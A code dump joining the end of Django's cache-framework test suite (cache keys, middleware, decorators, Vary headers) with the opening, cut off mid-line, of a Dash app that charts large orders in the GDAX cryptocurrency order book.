CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# The cache can be recovered
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
factory = RequestFactory()
def setUp(self):
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super().tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_cached_control_private_not_cached(self):
"""Responses with 'Cache-Control: private' are not cached."""
view_with_private_cache = cache_page(3)(cache_control(private=True)(hello_world_view))
request = self.factory.get('/view/')
response = view_with_private_cache(request, '1')
self.assertEqual(response.content, b'Hello World 1')
response = view_with_private_cache(request, '2')
self.assertEqual(response.content, b'Hello World 2')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the ETag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
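# Note: d41d8cd98f00b204e9800998ecf8427e is the MD5 of the empty string, which suggests the key suffix is an MD5 over the (here empty) vary_on values.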
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
app.py
|
# modules
# dash-related libraries
import dash
from dash.dependencies import Output, Event
from math import log10, floor, isnan
from datetime import datetime
from random import randint
import dash_core_components as dcc
import dash_html_components as html
import colorama
import sys
import getopt
# non-dash-related libraries
import plotly.graph_objs as go
import pandas as pd
import cbpro
import numpy as np
# modules added by contributors
import time
import threading
from queue import Queue
# custom library
from gdax_book import GDaxBook
colorama.init()
# creating variables to facilitate later parameterization
debugLevel = 3
debugLevels = ["Special Debug","Debug","Info","Warnings","Errors"]
debugColors = ['\033[34m','\033[90m','\033[32m','\033[33;1m','\033[31m']
serverPort = 8050
clientRefresh = 1
desiredPairRefresh = 10000 # (in ms) Lower values refresh at least some pairs faster; higher values reduce CPU load.
# js_extern = "https://cdn.rawgit.com/pmaji/crypto-whale-watching-app/master/main.js" # removed: you never know when a link will be hijacked; all js files are now loaded from the local source.
noDouble = True # if activated, an order that is part of a ladder is only drawn once (as a bubble, not additionally as a ladder)
SYMBOLS = {"USD": "$", "BTC": "₿", "EUR": "€", "GBP": "£"} # used for the tooltip
SIGNIFICANT = {"USD": 2, "BTC": 5, "EUR": 2, "GBP": 2} # used for rounding
TBL_PRICE = 'price'
TBL_VOLUME = 'volume'
tables = {}
depth_ask = {}
depth_bid = {}
marketPrice = {}
prepared = {}
shape_bid = {}
shape_ask = {}
timeStampsGet = {} # For storing timestamp of Data Refresh
timeStamps = {} # For storing timestamp from calc start at calc end
sendCache = {}
first_prepare = True
first_pull = True
overallNewData = False
class Exchange:
ticker = []
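# Note: this is a class-level (shared) list; extend() in __init__ mutates it for every instance. Harmless here because only one Exchange is created.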
client = ""
def __init__(self, pName, pTicker, pStamp):
self.name = pName
self.ticker.extend(pTicker)
self.millis = pStamp
class Pair:
# Class to store a pair with its respective threads
def __init__(self, pExchange, pTicker):
self.ob_Inst = {}
self.threadWebsocket = {}
self.threadPrepare = {}
self.threadRecalc = {}
self.Dataprepared = False
self.webSocketKill = 1
self.lastStamp = 0
self.usedStamp = 0
self.newData = False
self.name = pExchange + " " + pTicker
self.ticker = pTicker
self.lastUpdate = "0"
self.exchange = pExchange
self.prepare = False
self.websocket = False
self.combined = pExchange + pTicker
def log(pLevel, pMessage):
if pLevel >= debugLevel:
text = (str(datetime.now()) + " [" +
debugLevels[pLevel] +
"]: " + str(pMessage))
open("log.txt","a").write(text + "\n")
print(debugColors[pLevel] + text + '\033[0m')
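# Illustrative usage: log(2, "Server started") prints a green info-level line and appends the same text to log.txt.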
def get_ticker_list():
with open("trading_pairs.txt") as f:
the_list = sorted(word.strip(",") for line in f for word in line.split())
log(2, the_list)
return the_list
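# trading_pairs.txt is expected to hold whitespace- or comma-separated tickers, e.g. (hypothetical) "ETH-USD, BTC-USD".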
PAIRS = [] # Array containing all pairs
E_GDAX = Exchange("GDAX", get_ticker_list(),0) # get tickers from trading_pairs.txt file.
for ticker in E_GDAX.ticker:
cObj = Pair(E_GDAX.name, ticker)
PAIRS.append(cObj)
# creates a cache to speed up load time and facilitate refreshes
def get_data_cache(ticker):
return tables[ticker]
def get_All_data():
return prepared
def getSendCache():
return sendCache
def calc_data(pair, range=0.05, maxSize=32, minVolumePerc=0.01, ob_points=60):
global tables, timeStamps, shape_bid, shape_ask, E_GDAX, marketPrice, timeStampsGet
# function to get data from GDAX to be referenced in our callback later
# ticker: a string identifying the trading pair (e.g. ETH-USD)
# range: the deviation from the current price that remains visible
# maxSize: a parameter to limit the maximum size of the bubbles in the viz
# minVolumePerc: the minimum volume needed for a price point to be included in the viz
ticker = pair.ticker
exchange = pair.exchange
combined = exchange + ticker
if pair.exchange == E_GDAX.name:
# order_book = gdax.PublicClient().get_product_order_book(ticker, level=3)
order_book = pair.ob_Inst.get_current_book()
pair.usedStamp = getStamp()
ask_tbl = pd.DataFrame(data=order_book['asks'], columns=[
TBL_PRICE, TBL_VOLUME, 'address'])
bid_tbl = pd.DataFrame(data=order_book['bids'], columns=[
TBL_PRICE, TBL_VOLUME, 'address'])
timeStampsGet[pair.combined] = datetime.now().strftime("%H:%M:%S") # save timestamp at data pull time
# Determine what currencies we're working with to make the tool tip more dynamic.
currency = ticker.split("-")[0]
base_currency = ticker.split("-")[1]
sig_use = SIGNIFICANT.get(base_currency.upper(), 2)
symbol = SYMBOLS.get(base_currency.upper(), "")
try:
first_ask = float(ask_tbl.iloc[1, 0])
except (IndexError):
log(4,"Empty data for " + combined + " Will wait 3s")
time.sleep(3)
return False
# prepare Price
ask_tbl[TBL_PRICE] = pd.to_numeric(ask_tbl[TBL_PRICE])
bid_tbl[TBL_PRICE] = pd.to_numeric(bid_tbl[TBL_PRICE])
# data from websocket are not sorted yet
ask_tbl = ask_tbl.sort_values(by=TBL_PRICE, ascending=True)
bid_tbl = bid_tbl.sort_values(by=TBL_PRICE, ascending=False)
# get first on each side
first_ask = float(ask_tbl.iloc[1, 0])
# get perc for ask/ bid
perc_above_first_ask = ((1.0 + range) * first_ask)
perc_above_first_bid = ((1.0 - range) * first_ask)
# limits the size of the table so that we only look at orders 5% above and under market price
ask_tbl = ask_tbl[(ask_tbl[TBL_PRICE] <= perc_above_first_ask)]
bid_tbl = bid_tbl[(bid_tbl[TBL_PRICE] >= perc_above_first_bid)]
# changing this position after first filter makes calc faster
bid_tbl[TBL_VOLUME] = pd.to_numeric(bid_tbl[TBL_VOLUME])
ask_tbl[TBL_VOLUME] = pd.to_numeric(ask_tbl[TBL_VOLUME])
# prepare everything for the depth chart
ob_step = (perc_above_first_ask - first_ask) / ob_points
ob_ask = pd.DataFrame(columns=[TBL_PRICE, TBL_VOLUME, 'address', 'text'])
ob_bid = pd.DataFrame(columns=[TBL_PRICE, TBL_VOLUME, 'address', 'text'])
# The following builds the new tables 'ob_ask' and 'ob_bid', which contain the summed volume and address count from the current price out to each target price
i = 1
last_ask = first_ask
last_bid = first_ask
current_ask_volume = 0
current_bid_volume = 0
current_ask_adresses = 0
current_bid_adresses = 0
while i < ob_points:
# Get Borders for ask/ bid
current_ask_border = first_ask + (i * ob_step)
current_bid_border = first_ask - (i * ob_step)
# Get Volume
current_ask_volume += ask_tbl.loc[
(ask_tbl[TBL_PRICE] >= last_ask) & (ask_tbl[TBL_PRICE] < current_ask_border), TBL_VOLUME].sum()
current_bid_volume += bid_tbl.loc[
(bid_tbl[TBL_PRICE] <= last_bid) & (bid_tbl[TBL_PRICE] > current_bid_border), TBL_VOLUME].sum()
# Get Addresses
current_ask_adresses += ask_tbl.loc[
(ask_tbl[TBL_PRICE] >= last_ask) & (ask_tbl[TBL_PRICE] < current_ask_border), 'address'].count()
current_bid_adresses += bid_tbl.loc[
(bid_tbl[TBL_PRICE] <= last_bid) & (bid_tbl[TBL_PRICE] > current_bid_border), 'address'].count()
# Prepare Text
ask_text = (str(round_sig(current_ask_volume, 3, 0, sig_use)) + currency + " (from " + str(current_ask_adresses) +
" orders) up to " + str(round_sig(current_ask_border, 3, 0, sig_use)) + symbol)
bid_text = (str(round_sig(current_bid_volume, 3, 0, sig_use)) + currency + " (from " + str(current_bid_adresses) +
" orders) down to " + str(round_sig(current_bid_border, 3, 0, sig_use)) + symbol)
# Save Data
ob_ask.loc[i - 1] = [current_ask_border, current_ask_volume, current_ask_adresses, ask_text]
ob_bid.loc[i - 1] = [current_bid_border, current_bid_volume, current_bid_adresses, bid_text]
i += 1
last_ask = current_ask_border
last_bid = current_bid_border
# Get Market Price
try:
mp = round_sig((ask_tbl[TBL_PRICE].iloc[0] +
bid_tbl[TBL_PRICE].iloc[0]) / 2.0, 3, 0, sig_use)
except (IndexError):
log(4,"Empty data for " + combined + " Will wait 3s")
time.sleep(3)
return False
bid_tbl = bid_tbl.iloc[::-1] # flip the bid table so that the merged full_tbl is in logical order
fulltbl = bid_tbl.append(ask_tbl) # append the buy and sell side tables to create one cohesive table
minVolume = fulltbl[TBL_VOLUME].sum() * minVolumePerc # Calc minimum Volume for filtering
fulltbl = fulltbl[
(fulltbl[TBL_VOLUME] >= minVolume)] # limit our view to only orders greater than or equal to the minVolume size
fulltbl['sqrt'] = np.sqrt(fulltbl[
TBL_VOLUME]) # takes the square root of the volume (to be used later on for the purpose of sizing the order bubbles)
final_tbl = fulltbl.groupby([TBL_PRICE])[
[TBL_VOLUME]].sum() # transforms the table for a final time to craft the data view we need for analysis
final_tbl['n_unique_orders'] = fulltbl.groupby(
TBL_PRICE).address.nunique().astype(int)
final_tbl = final_tbl[(final_tbl['n_unique_orders'] <= 20.0)]
final_tbl[TBL_PRICE] = final_tbl.index
final_tbl[TBL_PRICE] = final_tbl[TBL_PRICE].apply(round_sig, args=(3, 0, sig_use))
final_tbl[TBL_VOLUME] = final_tbl[TBL_VOLUME].apply(round_sig, args=(1, 2))
final_tbl['n_unique_orders'] = final_tbl['n_unique_orders'].apply(round_sig, args=(0,))
final_tbl['sqrt'] = np.sqrt(final_tbl[TBL_VOLUME])
final_tbl['total_price'] = (((final_tbl['volume'] * final_tbl['price']).round(2)).apply(lambda x: "{:,}".format(x)))
# The following lines prevent orders from being drawn twice when they are part of a ladder but larger than 1%
if noDouble:
bid_tbl = bid_tbl[(bid_tbl['volume'] < minVolume)]
ask_tbl = ask_tbl[(ask_tbl['volume'] < minVolume)]
bid_tbl['total_price'] = bid_tbl['volume'] * bid_tbl['price']
ask_tbl['total_price'] = ask_tbl['volume'] * ask_tbl['price']
# Get Dataset for Volume Grouping
vol_grp_bid = bid_tbl.groupby([TBL_VOLUME]).agg(
{TBL_PRICE: [np.min, np.max, 'count'], TBL_VOLUME: np.sum, 'total_price': np.sum})
vol_grp_ask = ask_tbl.groupby([TBL_VOLUME]).agg(
{TBL_PRICE: [np.min, np.max, 'count'], TBL_VOLUME: np.sum, 'total_price': np.sum})
# Rename column names for Volume Grouping
vol_grp_bid.columns = ['min_Price', 'max_Price', 'count', TBL_VOLUME, 'total_price']
vol_grp_ask.columns = ['min_Price', 'max_Price', 'count', TBL_VOLUME, 'total_price']
# Filter data by min Volume; require at least 2 orders (a single order would interfere with its bubble) and fewer than 70 (mostly humans placing 1 or 0.5 ETH orders)
vol_grp_bid = vol_grp_bid[
((vol_grp_bid[TBL_VOLUME] >= minVolume) & (vol_grp_bid['count'] >= 2.0) & (vol_grp_bid['count'] < 70.0))]
vol_grp_ask = vol_grp_ask[
((vol_grp_ask[TBL_VOLUME] >= minVolume) & (vol_grp_ask['count'] >= 2.0) & (vol_grp_ask['count'] < 70.0))]
# Get the size of each order
vol_grp_bid['unique'] = vol_grp_bid.index.get_level_values(TBL_VOLUME)
vol_grp_ask['unique'] = vol_grp_ask.index.get_level_values(TBL_VOLUME)
# Round the size of order
vol_grp_bid['unique'] = vol_grp_bid['unique'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_ask['unique'] = vol_grp_ask['unique'].apply(round_sig, args=(3, 0, sig_use))
# Round the Volume
vol_grp_bid[TBL_VOLUME] = vol_grp_bid[TBL_VOLUME].apply(round_sig, args=(1, 0, sig_use))
vol_grp_ask[TBL_VOLUME] = vol_grp_ask[TBL_VOLUME].apply(round_sig, args=(1, 0, sig_use))
# Round the Min/ Max Price
vol_grp_bid['min_Price'] = vol_grp_bid['min_Price'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_ask['min_Price'] = vol_grp_ask['min_Price'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_bid['max_Price'] = vol_grp_bid['max_Price'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_ask['max_Price'] = vol_grp_ask['max_Price'].apply(round_sig, args=(3, 0, sig_use))
# Round and format the Total Price
vol_grp_bid['total_price'] = (vol_grp_bid['total_price'].round(sig_use).apply(lambda x: "{:,}".format(x)))
vol_grp_ask['total_price'] = (vol_grp_ask['total_price'].round(sig_use).apply(lambda x: "{:,}".format(x)))
# Append individual text to each element
vol_grp_bid['text'] = ("There are " + vol_grp_bid['count'].map(str) + " orders " + vol_grp_bid['unique'].map(
str) + " " + currency +
" each, from " + symbol + vol_grp_bid['min_Price'].map(str) + " to " + symbol +
vol_grp_bid['max_Price'].map(str) + " resulting in a total of " + vol_grp_bid[
TBL_VOLUME].map(str) + " " + currency + " worth " + symbol + vol_grp_bid[
'total_price'].map(str))
vol_grp_ask['text'] = ("There are " + vol_grp_ask['count'].map(str) + " orders " + vol_grp_ask['unique'].map(
str) + " " + currency +
" each, from " + symbol + vol_grp_ask['min_Price'].map(str) + " to " + symbol +
vol_grp_ask['max_Price'].map(str) + " resulting in a total of " + vol_grp_ask[
TBL_VOLUME].map(str) + " " + currency + " worth " + symbol + vol_grp_ask[
'total_price'].map(str))
# Save data global
shape_ask[combined] = vol_grp_ask
shape_bid[combined] = vol_grp_bid
cMaxSize = final_tbl['sqrt'].max() # Fixing Bubble Size
# nifty way of ensuring the size of the bubbles is proportional and reasonable
sizeFactor = maxSize / cMaxSize
final_tbl['sqrt'] = final_tbl['sqrt'] * sizeFactor
# making the tooltip column for our charts
final_tbl['text'] = (
"There is a " + final_tbl[TBL_VOLUME].map(str) + " " + currency + " order for " + symbol + final_tbl[
TBL_PRICE].map(str) + " being offered by " + final_tbl['n_unique_orders'].map(
str) + " unique orders worth " + symbol + final_tbl['total_price'].map(str))
# determine buys / sells relative to last market price; colors price bubbles based on size
# Buys are green, sells are red. Likely WHALES are highlighted by being brighter, detected by unique order count.
final_tbl['colorintensity'] = final_tbl['n_unique_orders'].apply(calcColor)
final_tbl.loc[(final_tbl[TBL_PRICE] > mp), 'color'] = \
'rgb(' + final_tbl.loc[(final_tbl[TBL_PRICE] >
mp), 'colorintensity'].map(str) + ',0,0)'
final_tbl.loc[(final_tbl[TBL_PRICE] <= mp), 'color'] = \
'rgb(0,' + final_tbl.loc[(final_tbl[TBL_PRICE]
